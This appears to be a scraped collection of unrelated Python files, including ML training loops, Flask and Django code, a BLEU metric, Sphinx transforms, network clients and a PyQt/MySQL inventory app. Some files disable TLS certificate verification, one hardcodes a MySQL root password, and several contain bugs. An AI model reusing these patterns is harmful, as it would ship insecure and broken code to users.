# W[len(n) - 1 - ini_i] = W[len(n) - 1 - ini_i] - alpha * (dJdW[len(n) - 1 - ini_i]/np.sqrt(SdJdW[len(n) - 1 - ini_i]+epsilon))
# b[len(n) - 1 - ini_i] = b[len(n) - 1 - ini_i] - alpha * (dJdb[len(n) - 1 - ini_i]/np.sqrt(SdJdb[len(n) - 1 - ini_i]+epsilon))
# Momentum gradient descent
VdJdW[len(n) - 1 - ini_i] = beta * VdJdW[len(n) - 1 - ini_i] + (1 - beta) * dJdW[len(n) - 1 - ini_i]
VdJdb[len(n) - 1 - ini_i] = beta * VdJdb[len(n) - 1 - ini_i] + (1 - beta) * dJdb[len(n) - 1 - ini_i]
W[len(n) - 1 - ini_i] = W[len(n) - 1 - ini_i] - alpha * VdJdW[len(n) - 1 - ini_i]
b[len(n) - 1 - ini_i] = b[len(n) - 1 - ini_i] - alpha * VdJdb[len(n) - 1 - ini_i]
# General gradient descent
# W[len(n) - 1 - ini_i] = W[len(n) - 1 - ini_i] - alpha * dJdW[len(n) - 1 - ini_i]
# b[len(n) - 1 - ini_i] = b[len(n) - 1 - ini_i] - alpha * dJdb[len(n) - 1 - ini_i]
j = j + 1
# print(dJdW)
print("iteration times is:%d" % j)
# test result
# print(test.caculate_W_batch_norm(X, Y, g, n))
show_ans(X, Y, m, ax1)
show_class(W, b, n, g, X_max, X_min, ax2)
show_ans(X, Y_tra, m, ax3)
show_err(ax4, err)
plt.show()
|
997,746 | d929e0a5ffce4708ecd3042435a696254f2d0e0c | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, DecimalField
from wtforms.validators import DataRequired
class ProductForm(FlaskForm):
name = StringField('Product Name')
description = StringField('Product Description')
price = DecimalField('Per Unit Price', places=2)
image = StringField('Product Image URL')
submit = SubmitField()
class DeletePostForm(FlaskForm):
submit = SubmitField() |
997,747 | 39c538142b70d8bf20a6015ce1a9adeebc674225 | #testing commands
print("New Python file")
|
997,748 | baa66480eda9edf19c46c53ae933c145c66f6e2d | #/usr/bin/python
# coding: utf-8
import pytest
import os
from src import hotcount_standalone
def test_writetofile(tmpdir):
count = {'TS_L251a_21_Ampliseq_2014-11-14.fastq': {'all': 550, 'wt': 282, 'delg': 24},
'TS_L1095a_055_Ampliseq_AML_201-12-22.fastq': {'all': 317, 'wt': 151, 'delg': 22}}
res_file = tmpdir.mkdir("sub").join("result.txt")
file = hotcount_standalone.to_csv(count, str(res_file))
with open(file, 'r') as file:
assert file.readline() == 'sample,all,wt,delg\r\n'
def test_to_dict():
assert diff(hotcount_standalone.to_dict("resources/testfile/test2.txt"),
{'/home/aurelien/HotCount_project/hotcount/data/asxl1/dupG_Pos/TS_L251a_21_Ampliseq_2014-11-14.fastq': {'all': '750', 'delg': '420', 'wt': '140'},
"/home/aurelien/HotCount_project/hotcount/data/asxl1/dupG_Pos/TS_L1095a_055_Ampliseq_AML_201-12-22.fastq":{'all':'317','delg':'151','wt':'22'}})==0
def test_count():
hotcount_standalone.StandAlone().count(
{'all': 'ATCGGAGGG.*GGGTGGCCC', 'wt': 'ATCGGAGGGGGGGGTGGCCC', 'delg': 'ATCGGAGGGGGGGTGGCCC'},
'resources/testfile/asxl1/file1/','FASTQ',True,"DNA","result.txt")
with open("result.txt", 'r') as file:
assert file.readline() == 'sample,all,wt,delg\r\n'
assert file.readline() == "resources/testfile/asxl1/file1/TS_L251a_21_Ampliseq_2014-11-14.fastq, 550,282,24\r\n"
def test_stat():
#hotcount_standalone.StandAlone().stat()
pass
def test_all():
pass
def diff(list1, list2):
"""
docstring pour diff
function used to compare 2 list without redundancy
usable for test with known input
"""
c = set(list1).union(set(list2))
d = set(list1).intersection(set(list2))
return len(list(c - d)) |
997,749 | 23be3289a2537779c09796714b528d5a7f8dd92e | # methods for jet tracking that do not involve the camera
import numpy as np
from scipy.optimize import curve_fit
def gaussianslope(x, a, mean, std, m, b):
'''
Define the function for a Gaussian on a slope (Gaussian + linear)
Parameters
----------
x : float
x-coordinate
a : float
amplitude of Gaussian
mean : float
mean of Gaussian
std : float
standard deviation of Gaussian
m : float
slope of linear baseline
b : float
y-intercept of linear baseline
Returns
-------
y : float
the y-coordinate for the given x-coordinate as defined by the
parameters given for the Gaussian on a slope
'''
return (a * np.exp(-((x-mean) / 2 / std) ** 2)) + (m * x + b)
def fit_cspad(azav, norm, gas_det):
'''
Fit the Azimuthal average of the CSPAD to a Gaussian on a slope
Parameters
----------
azav : ndarray
Azimuthal average for CSPAD
norm : ndarray
number of pixels in each qbin
gas_det : float
gas detector
Returns
-------
center : int
radius of the diffraction ring
intensity : float
sum of qbins 5 above and below the center, normalized by gas detector
'''
# determine number of pixels in each qbin, only use qbins where pixels > 150
# **can change 150 to different value if needed
start = 0
end = len(norm)
begin = end / 2
for i in range(begin):
a = begin - i
b = begin + i
if (norm[a] < 150) and (a > start):
start = a
if (norm[b] < 150) and (b < end):
end = b
x = np.arange(len(azav))
# estimate mean and standard deviation for Gaussian
n = len(x)
mean = sum(x*azav) / sum(azav)
std = np.sqrt(sum((x-mean)**2)/n)
# estimate slope and y-intercept for linear baseline by taking first & last
# 50 points and fitting a line between them
# **can change 50 to different value if needed
x0 = 50/2
l = len(azav)
x1 = l - (50/2)
y0 = np.mean(azav[0:50])
y1 = np.mean(azav[l-50:])
m, b = np.polyfit((x0, x1), (y0, y1), 1)
# fit Gaussian + linear to Azimuthal average; provide initial parameters
popt, pcov = curve_fit(gaussianslope, x, azav, p0=[max(azav), mean, std, m, b])
# calculate radius of ring and intensity of center 10 qbins
center = int(round(popt[1]))
intensity = sum(azav[center-5:center+5]) / gas_det
return center, intensity
def get_cspad(azav, r, gas_det):
'''
Get the intensity of the diffraction ring on the CSPAD
Parameters
----------
azav : ndarray
Azimuthal average calculated from CSPAD
r : int
radius of diffraction ring
gas_det : float
gas detector
Returns
-------
intensity : float
sum of qbins 5 above and below the center, normalized by gas detector
'''
intensity = sum(azav[r-5:r+5]) / gas_det
return intensity
# unfinished methods for checking stopper, pulse picker, and Wave8
# can make Ophyd devices or load specific PV needed directly into beamline.py
def get_stopper(stopper):
return stopper
def get_pulse_picker(pulse_picker):
return pulse_picker
def get_wave8(wave8):
return wave8
|
997,750 | 73f51d8b3acd9ad305dda6aa1b0bf980718dd591 | from src.transpiler.syntax_tree import *
from src.grammar.nodes.expression import Expression
class Declaration(Node):
def is_init(self):
"""
Returns true, if the declaration also contains an initialization.
:return:
"""
if len(self.children) == 4:
return isinstance(self.children[3], Expression)
return False
def write(self, int_state, block=None):
# Only write the initialization. Declaration is handled by top level objects.
if self.is_init():
block.append_line(self.children[1].string + ' := ')
self.children[3].write(int_state, block)
Node.node_map['DECLARATION'] = Declaration
class GlobalVariable(Node):
def write(self, int_state, block=None):
# GLOBAL = seq(DECLARATION, ';')
declaration = self.children[0]
int_state.globals.append_line(declaration.children[1].string)
# DECLARATION = seq(TYPE, VARIABLE_NAME, opt(Choice(seq('=', EXPRESSION), Repeat(seq(',', VARIABLE_NAME)))))
# If the declaration contains at least 4 elements,
# it has either an initialization or contains multiple variable names.
if len(declaration.children) >= 4:
if isinstance(declaration.children[3], Expression): # Initialization.
# seq(TYPE, VARIABLE_NAME, '=', EXPRESSION)
int_state.init.append_line(declaration.children[1].string + ' := ')
declaration.children[3].write(int_state, int_state.init)
int_state.init.append(';')
else: # Multiple declarations.
# seq(TYPE, VARIABLE_NAME, Repeat(seq(',', VARIABLE_NAME)))
# additional names are at positions 3 + 2 * k
for i in range(3, len(declaration.children), 2):
int_state.globals.append(', ' + declaration.children[i].string)
# Type and semi colon.
int_state.globals.append(' : ' + declaration.children[0].translated() + ';')
Node.node_map['GLOBAL'] = GlobalVariable
class Constant(Node):
def write(self, int_state, block=None):
# CONSTANT = seq(Keyword('const'), opt(TYPE), VARIABLE_NAME, '=', LITERAL, ';')
name = self.children[1].translated()
value = self.children[3].translated()
if value == '=': # opt(TYPE) is used.
name = self.children[2].translated()
value = self.children[4].translated()
int_state.constants.append_line(name + ' = ' + value + ';')
Node.node_map['CONSTANT'] = Constant
|
997,751 | 306a0acad858ba4af0c4ccb83eaa285f36b81e21 | import argparse
import fasttext
from functools import reduce
import math
import pdb
import operator
from sklearn.metrics import accuracy_score
model=fasttext.load_model('./train.sentiment.bin')
def geometric_mean(precisions):
return (reduce(operator.mul, precisions))**(1.0/len(precisions))
def clip_count(cand_d, ref_ds):
'''
arguments:
cand_d:{'I': 1, 'had': 1, 'a':1, 'dinner':1}
ref_ds:[{'He':1, 'had': 1, 'a':1, 'dinner':1},
{'He':1, 'had':1, 'a':1, 'lunch':1}[
returns:
'''
count=0
for key, value in cand_d.items():
key_max=0
# for ref in ref_ds:
# if key in ref:
if key in ref_ds:
key_max=max(key_max, ref_ds[key])
# key_max=max(key_max, ref[key])
clipped_count=min(value, key_max)
count+=clipped_count
return count
def ngram_precision(candidate, references, n):
def _count_ngram(sentence, n):
ngram_d={}
words=sentence.strip().split()
leng=len(words)
limits=leng-n+1
for i in range(limits):
ngram=' '.join(words[i:i+n]).lower()
if ngram in ngram_d.keys():
ngram_d[ngram]+=1
else:
ngram_d[ngram]=1
return ngram_d
clipped_count=0
count=0
for si in range(len(candidate)):
# ref_counts=[]
# for reference in references:
# ngram_d=_count_ngram(reference, n)
# ref_counts.append(ngram_d)
ref_counts=_count_ngram(references[si], n)
cand_dict=_count_ngram(candidate[si], n)
n_grams=0
for key, values in cand_dict.items():
n_grams+=values
clipped_count+=clip_count(cand_dict, ref_counts)
count+=n_grams
if clipped_count==0:
pr=0
else:
pr=float(clipped_count) / count
return pr
def brevity_penalty(c, r):
if c>r:
bp=1
else:
bp=math.exp(1-(float(r)/c))
return bp
def best_length_match(ref_lens, cand_len):
least_diff=abs(cand_len-ref_lens[0])
best=ref_lens[0]
for ref_len in ref_lens:
if abs(cand_len-ref_len) < least_diff:
least_diff=abs(cand_l-ref_len)
best=ref_len
return best
def calculate_bp(candidate, references):
r, c=0, 0
# bp=list()
for si in range(len(candidate)):
# ref_lengths=list()
len_ref=len(references[si].strip().split())
# for reference in references:
# ref_length=len(reference[si].strip().split())
# ref_lengths.append(ref_length)
len_candidate=len(candidate[si].strip().split())
# r+=best_length_match(ref_length, len_candidate)
# r+=best_length_match(ref_lengths, len_candidate)
r+=len_ref
c+=len_candidate
bp=brevity_penalty(c, r)
return bp
def getBleu(candidate, references):
precisions=list()
for i in range(4):
pr=ngram_precision(candidate, references, i+1)
precisions.append(pr)
bp=calculate_bp(candidate, references)
bleu=geometric_mean(precisions)*bp
return bleu, bp, precisions
def getAccuracy(generated_sentence, labels, positive=None, negative=None, pred=None):
if positive is None:
positive=list()
negative=list()
pred=list()
# #one sentence
# if type(generated_sentence)==str:
# result=model.predict(generated_sentence, k=1, threshold=0.5)
# if '0' in result[0][0]:
# pred.append(0)
# elif '1' in result[0][0]:
# pred.append(1)
# return accuracy_score(true, pred)
#
for i in range(len(generated_sentence)):
result=model.predict(generated_sentence[i], k=1, threshold=0.5)
if '0' in result[0][0]:
negative.append(generated_sentence[i])
pred.append(0)
elif '1' in result[0][0]:
positive.append(generated_sentence[i])
pred.append(1)
else:
print('classification error')
pdb.set_trace()
return accuracy_score(labels, pred)
|
997,752 | 550e245065105ad7d02ef64cfd5ffec3439e6f6c | N=int(input())
S=str(input())
ls = []
for i in range(len(S)):
ls.append(S[i])
for i in range(len(S)):
x = S[i]
#print(ord(x)+N,ord("Z"))
if ord(x)+N > ord("Z"):
#print("if")
#print(ord("A")-ord("Z")+(ord(x)+N))
ls[i]=chr(ord("A")-ord("Z")+(ord(x)+N)-1)
else:
#print("else")
ls[i]=chr((ord(x)+N))
print("".join(ls))
|
997,753 | 4c61fa68366aed9a39d4bace93c6b4413e727c9c | import serial
import pycurl
import StringIO
import re
import time
import requests
ser = serial.Serial('/dev/ttyACM0', 9600)
sensorDataOld = '0'
sensorDataNew = '1'
try:
while 1 :
sensorDataNew = ser.readline()
if(sensorDataNew != sensorDataOld) :
sensorList = sensorDataNew.split(',')
urlToSend = 'http://erictest.strivemanagementgroup.com/prostudy/piFeed.php'
payload = {'l':re.sub('[^0-9]', '', sensorList[1]), 'm':re.sub('[^0-9]', '', sensorList[2]), 'd':1}
r = requests.get(urlToSend, params=payload)
print(r.url)
print (r.text)
sensorDataOld = sensorDataNew
except KeyboardInterrupt:
print 'terminating'
|
997,754 | 26804231a1d427e50850f8b778f266b8eaadaff3 | # Generated by Django 2.1 on 2018-08-10 17:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Discipline',
fields=[
('discipline_id_num', models.CharField(max_length=20, primary_key=True, serialize=False)),
('name', models.CharField(max_length=200)),
('workload', models.IntegerField()),
('description', models.CharField(max_length=300)),
],
),
migrations.CreateModel(
name='Student',
fields=[
('student_id_num', models.CharField(max_length=20, primary_key=True, serialize=False)),
('first_name', models.CharField(max_length=200)),
('last_name', models.CharField(max_length=200)),
('subscription_date', models.DateTimeField(verbose_name='Subscription Date')),
('year_in_school', models.CharField(choices=[('FR', 'Freshman'), ('SO', 'Sophomore'), ('JR', 'Junior'), ('SR', 'Senior'), ('GR', 'Graduate')], default='FR', max_length=2)),
],
),
migrations.CreateModel(
name='Teacher',
fields=[
('teacher_id_number', models.CharField(max_length=20, primary_key=True, serialize=False)),
('first_name', models.CharField(max_length=200)),
('last_name', models.CharField(max_length=200)),
('subscription_date', models.DateField(verbose_name='subscription date')),
('area_of_domain', models.CharField(choices=[('CE', 'College of Engineering'), ('CAS', 'College of Arts and Sciences'), ('IA', 'International Affairs'), ('MCS', 'Mathematics and Computer Science'), ('MHS', 'Medicine and Health Sciences')], default='CE', max_length=3)),
],
),
migrations.AddField(
model_name='discipline',
name='students',
field=models.ManyToManyField(to='uni.Student'),
),
migrations.AddField(
model_name='discipline',
name='teacher',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='uni.Teacher'),
),
]
|
997,755 | bed09a50076d72ab86693a3cb46345c2f7f7476b | #!/usr/bin/env python3
oldfile = open("lalala","w")
oldfile.write("hello word\n")
oldfile.close()
newfile = open("lalala", "r")
for i in newfile:
print(i, end='')
newfile.close() |
997,756 | 35411ee4dcc1df0b2b4b2a59de7c2610a1ec4e3a | """
BATCH - How it works
async def get_location(address)
1. Put the address on a queue of requests.
2. Start a background task that:
i. Waits a short time for other requests to be enqueued.
ii. Processes all queued requests as a batch.
iii. Notifies the waiting 'get_location' functions.
3. Wait for the result and return it.
"""
import asyncio
import json
from urllib.parse import urlencode
import aiohttp
# Constants for accessing the Geoapify batch API
GEOCODING_BATCH_API = "https://api.geoapify.com/v1/batch/geocode/search"
YOUR_API_KEY = "xxxx-xxxx-xxxx-xxxx"
async def get_locations(addresses):
"""Return a dictionary of address -> (lat, lon)."""
# Construct the URL to do the batch request
query_string = urlencode({"apiKey": YOUR_API_KEY})
url = f"{GEOCODING_BATCH_API}?{query_string}"
# Build the JSON payload for the batch POST request
data = json.dumps(addresses)
# And use Content-Type: application/json in the headers
headers = {"Content-Type": "application/json", "Accept": "application/json"}
# Make the POST request to the API
async with aiohttp.ClientSession() as session:
async with session.post(url, data=data, headers=headers) as response:
response_json = await response.read()
response_data = json.loads(response_json)
# The API can return a dict with a pending status if it needs more
# time to complete. Poll the API until the result is ready.
while isinstance(response_data, dict) and response_data.get("status") == "pending":
# Wait a bit before calling the API
await asyncio.sleep(0.1)
# Query the result to see if it's ready yet
request_id = response_data.get("id")
async with aiohttp.ClientSession() as session:
async with session.get(url + f"&id={request_id}") as response:
response_json = await response.read()
response_data = json.loads(response_json)
# Gather the results into a dictionary of address -> (lat, lon)
locations = {}
for result in response_data:
address = result["query"]["text"]
coords = result["lat"], result["lon"]
locations[address] = coords
return locations
|
997,757 | 1b53918d324ad62b336781e35772ccb1e52848eb | #!/usr/bin/env python
from socketIO_client import SocketIO, BaseNamespace
import requests,json,sys
'''
This file suppose deploy on the docker container with python image
pre-configed.
It will listen to the socketIO server side if there is any link event
such as node failure, link failure.
'''
# Disable warnings about unverified certificates
if hasattr(requests, 'packages') and hasattr(requests.packages, 'urllib3'):
requests.packages.urllib3.disable_warnings()
# load from your config file plz...
serverURL = 'https://1.1.1.1'
username = '*******'
password = '*******'
class NSNotificationNamespace(BaseNamespace):
def on_connect(self):
print('Connected to %s:8443/restNotifications-v2'%serverURL)
def on_event(key,name,data):
print "NorthStar Event: %r,data:%r"%(name,json.dumps(data))
if data['notificationType'] == 'link':
print 'Got Link update: '
obj = data['object']
print 'id: ',obj['id']
from_ = obj['endA']
to = obj['endZ']
print 'from ',from_['ipv4Address']['address']
print 'to ',to['ipv4Address']['address']
print 'status: ', obj['operationalStatus']
elif data['notificationType'] == 'node':
print 'Got Node update'
else:
print 'Got Unknown update'
print ''
# First use NorhtStar OAuth2 authentication API to get a token
payload = {'grant_type': 'password','username': username,'password': password}
r = requests.post(serverURL + ':8443/oauth2/token',data=payload,verify=False,auth=(username, password))
data =r.json()
if "token_type" not in data or "access_token" not in data:
print "Error: Invalid credentials"
sys.exit(1)
headers= {'Authorization': "{token_type} {access_token}".format(**data)}
socketIO = SocketIO(serverURL, 8443,verify=False,headers= headers)
ns = socketIO.define(NSNotificationNamespace, '/restNotifications-v2')
socketIO.wait() |
997,758 | 9eabd78864709d55efb13130be4583d7c74fc2ed | from django.contrib import admin
from demo.models.application import application
from demo.models.product import product
from demo.models.indication import indication
from demo.models.personne import Personne
from import_export.admin import ImportExportModelAdmin
@admin.register(application)
class applicationAdmin(ImportExportModelAdmin):
pass
@admin.register(product)
class productAdmin(ImportExportModelAdmin):
pass
@admin.register(indication)
class indicationAdmin(ImportExportModelAdmin):
pass
@admin.register(Personne)
class indicationAdmin(ImportExportModelAdmin):
pass |
997,759 | 2831ec2beee9ad9ea6ded5e532e1ba34fe698d97 | from django.urls import path
from .views import (
PlaceListAPIView,
PlaceDetailAPIView,
PlaceUpdateAPIView,
)
urlpatterns=[
path('',PlaceListAPIView.as_view(),name='list'),
path('<slug:slug>/detail',PlaceDetailAPIView.as_view(),name='detail'),
path('<slug:slug>/update',PlaceUpdateAPIView.as_view(),name='update'),
] |
997,760 | a02f81207bb180262f692c7f5648902ed4f1e3bd | # invoer
dikte_papier = int(input('dikte papier (in mm): '))
afstand_hemellichaam = int(input('afstand tot hemellichaam (in mm): '))
# berekening
aantal_keer_vouwen = 0
hoogte_gevouwen_papier = dikte_papier
while hoogte_gevouwen_papier < afstand_hemellichaam:
aantal_keer_vouwen += 1
hoogte_gevouwen_papier *= 2
uitvoer = 'Na {} keer vouwen bedraagt de dikte van het papier {} mm.'
# uitvoer
print(uitvoer.format(aantal_keer_vouwen, hoogte_gevouwen_papier))
|
997,761 | 6bd5f07e27e8b836cf04465ee7c47a0dd3730e45 | """Docutils transforms used by Sphinx."""
from __future__ import annotations
import re
from typing import TYPE_CHECKING, Any, cast
from docutils import nodes
from docutils.nodes import Element, Node
from sphinx import addnodes
from sphinx.errors import NoUri
from sphinx.locale import __
from sphinx.transforms import SphinxTransform
from sphinx.util import logging
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.nodes import find_pending_xref_condition, process_only_nodes
if TYPE_CHECKING:
from collections.abc import Sequence
from sphinx.addnodes import pending_xref
from sphinx.application import Sphinx
from sphinx.domains import Domain
logger = logging.getLogger(__name__)
class SphinxPostTransform(SphinxTransform):
"""A base class of post-transforms.
Post transforms are invoked to modify the document to restructure it for outputting.
They resolve references, convert images, do special transformation for each output
formats and so on. This class helps to implement these post transforms.
"""
builders: tuple[str, ...] = ()
formats: tuple[str, ...] = ()
def apply(self, **kwargs: Any) -> None:
if self.is_supported():
self.run(**kwargs)
def is_supported(self) -> bool:
"""Check this transform working for current builder."""
if self.builders and self.app.builder.name not in self.builders:
return False
if self.formats and self.app.builder.format not in self.formats:
return False
return True
def run(self, **kwargs: Any) -> None:
"""Main method of post transforms.
Subclasses should override this method instead of ``apply()``.
"""
raise NotImplementedError
class ReferencesResolver(SphinxPostTransform):
"""
Resolves cross-references on doctrees.
"""
default_priority = 10
def run(self, **kwargs: Any) -> None:
for node in self.document.findall(addnodes.pending_xref):
content = self.find_pending_xref_condition(node, ("resolved", "*"))
if content:
contnode = cast(Element, content[0].deepcopy())
else:
contnode = cast(Element, node[0].deepcopy())
newnode = None
typ = node['reftype']
target = node['reftarget']
node.setdefault('refdoc', self.env.docname)
refdoc = node.get('refdoc')
domain = None
try:
if 'refdomain' in node and node['refdomain']:
# let the domain try to resolve the reference
try:
domain = self.env.domains[node['refdomain']]
except KeyError as exc:
raise NoUri(target, typ) from exc
newnode = domain.resolve_xref(self.env, refdoc, self.app.builder,
typ, target, node, contnode)
# really hardwired reference types
elif typ == 'any':
newnode = self.resolve_anyref(refdoc, node, contnode)
# no new node found? try the missing-reference event
if newnode is None:
newnode = self.app.emit_firstresult('missing-reference', self.env,
node, contnode,
allowed_exceptions=(NoUri,))
# still not found? warn if node wishes to be warned about or
# we are in nit-picky mode
if newnode is None:
self.warn_missing_reference(refdoc, typ, target, node, domain)
except NoUri:
newnode = None
if newnode:
newnodes: list[Node] = [newnode]
else:
newnodes = [contnode]
if newnode is None and isinstance(node[0], addnodes.pending_xref_condition):
matched = self.find_pending_xref_condition(node, ("*",))
if matched:
newnodes = matched
else:
logger.warning(__('Could not determine the fallback text for the '
'cross-reference. Might be a bug.'), location=node)
node.replace_self(newnodes)
def resolve_anyref(
self, refdoc: str, node: pending_xref, contnode: Element,
) -> Element | None:
"""Resolve reference generated by the "any" role."""
stddomain = self.env.get_domain('std')
target = node['reftarget']
results: list[tuple[str, Element]] = []
# first, try resolving as :doc:
doc_ref = stddomain.resolve_xref(self.env, refdoc, self.app.builder,
'doc', target, node, contnode)
if doc_ref:
results.append(('doc', doc_ref))
# next, do the standard domain (makes this a priority)
results.extend(stddomain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
for domain in self.env.domains.values():
if domain.name == 'std':
continue # we did this one already
try:
results.extend(domain.resolve_any_xref(self.env, refdoc, self.app.builder,
target, node, contnode))
except NotImplementedError:
# the domain doesn't yet support the new interface
# we have to manually collect possible references (SLOW)
for role in domain.roles:
res = domain.resolve_xref(self.env, refdoc, self.app.builder,
role, target, node, contnode)
if res and len(res) > 0 and isinstance(res[0], nodes.Element):
results.append((f'{domain.name}:{role}', res))
# now, see how many matches we got...
if not results:
return None
if len(results) > 1:
def stringify(name: str, node: Element) -> str:
reftitle = node.get('reftitle', node.astext())
return f':{name}:`{reftitle}`'
candidates = ' or '.join(stringify(name, role) for name, role in results)
logger.warning(__("more than one target found for 'any' cross-"
'reference %r: could be %s'), target, candidates,
location=node)
res_role, newnode = results[0]
# Override "any" class with the actual role type to get the styling
# approximately correct.
res_domain = res_role.split(':')[0]
if (len(newnode) > 0 and
isinstance(newnode[0], nodes.Element) and
newnode[0].get('classes')):
newnode[0]['classes'].append(res_domain)
newnode[0]['classes'].append(res_role.replace(':', '-'))
return newnode
def warn_missing_reference(self, refdoc: str, typ: str, target: str,
node: pending_xref, domain: Domain | None) -> None:
warn = node.get('refwarn')
if self.config.nitpicky:
warn = True
dtype = f'{domain.name}:{typ}' if domain else typ
if self.config.nitpick_ignore:
if (dtype, target) in self.config.nitpick_ignore:
warn = False
# for "std" types also try without domain name
if (not domain or domain.name == 'std') and \
(typ, target) in self.config.nitpick_ignore:
warn = False
if self.config.nitpick_ignore_regex:
def matches_ignore(entry_type: str, entry_target: str) -> bool:
return any(
(
re.fullmatch(ignore_type, entry_type)
and re.fullmatch(ignore_target, entry_target)
)
for ignore_type, ignore_target
in self.config.nitpick_ignore_regex
)
if matches_ignore(dtype, target):
warn = False
# for "std" types also try without domain name
if (not domain or domain.name == 'std') and \
matches_ignore(typ, target):
warn = False
if not warn:
return
if self.app.emit_firstresult('warn-missing-reference', domain, node):
return
elif domain and typ in domain.dangling_warnings:
msg = domain.dangling_warnings[typ] % {'target': target}
elif node.get('refdomain', 'std') not in ('', 'std'):
msg = (__('%s:%s reference target not found: %s') %
(node['refdomain'], typ, target))
else:
msg = __('%r reference target not found: %s') % (typ, target)
logger.warning(msg, location=node, type='ref', subtype=typ)
def find_pending_xref_condition(self, node: pending_xref, conditions: Sequence[str],
) -> list[Node] | None:
for condition in conditions:
matched = find_pending_xref_condition(node, condition)
if matched:
return matched.children
return None
class OnlyNodeTransform(SphinxPostTransform):
default_priority = 50
def run(self, **kwargs: Any) -> None:
# A comment on the comment() nodes being inserted: replacing by [] would
# result in a "Losing ids" exception if there is a target node before
# the only node, so we make sure docutils can transfer the id to
# something, even if it's just a comment and will lose the id anyway...
process_only_nodes(self.document, self.app.builder.tags)
class SigElementFallbackTransform(SphinxPostTransform):
"""Fallback various desc_* nodes to inline if translator does not support them."""
default_priority = 200
def run(self, **kwargs: Any) -> None:
def has_visitor(translator: type[nodes.NodeVisitor], node: type[Element]) -> bool:
return hasattr(translator, "visit_%s" % node.__name__)
try:
translator = self.app.builder.get_translator_class()
except AttributeError:
# do nothing if no translator class is specified (e.g., on a dummy builder)
return
if issubclass(translator, SphinxTranslator):
# subclass of SphinxTranslator supports desc_sig_element nodes automatically.
return
# for the leaf elements (desc_sig_element), the translator should support _all_,
# unless there exists a generic visit_desc_sig_element default visitor
if (not all(has_visitor(translator, node) for node in addnodes.SIG_ELEMENTS)
and not has_visitor(translator, addnodes.desc_sig_element)):
self.fallback(addnodes.desc_sig_element)
if not has_visitor(translator, addnodes.desc_inline):
self.fallback(addnodes.desc_inline)
def fallback(self, node_type: Any) -> None:
"""Translate nodes of type *node_type* to docutils inline nodes.
The original node type name is stored as a string in a private
``_sig_node_type`` attribute if the latter did not exist.
"""
for node in self.document.findall(node_type):
newnode = nodes.inline()
newnode.update_all_atts(node)
newnode.extend(node)
# Only set _sig_node_type if not defined by the user
newnode.setdefault('_sig_node_type', node.tagname)
node.replace_self(newnode)
class PropagateDescDomain(SphinxPostTransform):
"""Add the domain name of the parent node as a class in each desc_signature node."""
default_priority = 200
def run(self, **kwargs: Any) -> None:
for node in self.document.findall(addnodes.desc_signature):
if node.parent.get('domain'):
node['classes'].append(node.parent['domain'])
def setup(app: Sphinx) -> dict[str, Any]:
app.add_post_transform(ReferencesResolver)
app.add_post_transform(OnlyNodeTransform)
app.add_post_transform(SigElementFallbackTransform)
app.add_post_transform(PropagateDescDomain)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
|
997,762 | 7f952b6b152e8c76216268b5c4cd7a97b8a3167b |
from xai.brain.wordbase.nouns._watchtower import _WATCHTOWER
#calss header
class _WATCHTOWERS(_WATCHTOWER, ):
def __init__(self,):
_WATCHTOWER.__init__(self)
self.name = "WATCHTOWERS"
self.specie = 'nouns'
self.basic = "watchtower"
self.jsondata = {}
|
997,763 | 16864dea148107076a2c6ea45b9827fd87f0eb83 | for i in range(1, 11):
# If i is equals to 6,
# continue to next iteration
# without printing
if i == 6:
continue
else:
# otherwise print the value
# of i
print(i, end=" ")
|
997,764 | 8ab2c2bcb8d2cebfc7b5bee11fbe0fdfc0a41582 | import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from zoket import client
import MySQLdb
import string
class MyTableModel(QAbstractTableModel):
def __init__(self, datain, parent=None, *args):
QAbstractTableModel.__init__(self, parent, *args)
self.arraydata = datain
def rowCount(self, parent):
return len(self.arraydata)
def columnCount(self, parent):
return len(self.arraydata[0])
def data(self, index, role):
if not index.isValid():
return QVariant()
elif role != Qt.DisplayRole:
return QVariant()
return QVariant(self.arraydata[index.row()][index.column()])
class Ui_Dialog(object):
def showEMessageBox(self,message):
msg = QMessageBox()
msq.setIcon(QMessageBox.Warning)
msg.setWindowTitle("Error")
msg.setInformativeText(message)
msg.setStandardButtons(QMessageBox.Ok)
msg.exec_()
def showCMessageBox(self,message):
msg = QMessageBox()
msg.setIcon(QMessageBox.Information)
msg.setWindowTitle("Error")
msg.setInformativeText(message)
msg.setStandardButtons(QMessageBox.Ok)
msg.exec_()
################# Todo lo de articulos Aca abajo###################
class listaa(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
artitable = QTableView()
layout = QHBoxLayout()
layout.addWidget(artitable)
con = MySQLdb.connect('localhost','root','oveja','Tienda Virtual')
cursor = con.cursor()
cursor.execute("SELECT idArticulos, Articulos.Descripcion, stock, precio_unitario, Categoria.Descripcion FROM Articulos, Categoria WHERE Cod_categoria = idCategoria;")
save = cursor.fetchall()
tablemodel = MyTableModel(save, self)
artitable.setModel(tablemodel)
self.widget = QWidget()
self.widget.setLayout(layout)
self.setCentralWidget(self.widget)
self.setWindowTitle("Lista de articulos")
class agregara(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
global cod, desc, st,pre,cat
l1 = QLabel("Codigo de Articulo")
cod = QTextEdit()
l2 = QLabel("Descripcion")
desc = QTextEdit()
l3 = QLabel("Cantidads")
st = QTextEdit()
l4 = QLabel("Precio")
pre = QTextEdit()
l5 = QLabel("Categoria")
cat = QTextEdit()
fbox = QFormLayout()
fbox.addRow(l1,cod)
fbox.addRow(l2,desc)
fbox.addRow(l3,st)
fbox.addRow(l4,pre)
fbox.addRow(l5,cat)
button1 = QPushButton("Agregar")
fbox.addRow(button1)
self.connect(button1, SIGNAL('clicked()'), self.inserta)
self.widget = QWidget()
self.widget.setLayout(fbox)
self.setCentralWidget(self.widget)
self.setWindowTitle("Agregar articulos")
def inserta(self):
abc = client()
prot = "insertarA"
uid = cod.toPlainText()
nm = desc.toPlainText()
ape= st.toPlainText()
cor= pre.toPlainText()
tel= cat.toPlainText()
ms = Ui_Dialog()
if(str(uid).isalpha() or uid == "" or int(uid)<0):
ms.showEMessageBox("Id no puede contener letras o estar vacio y no puede ser menor a 0")
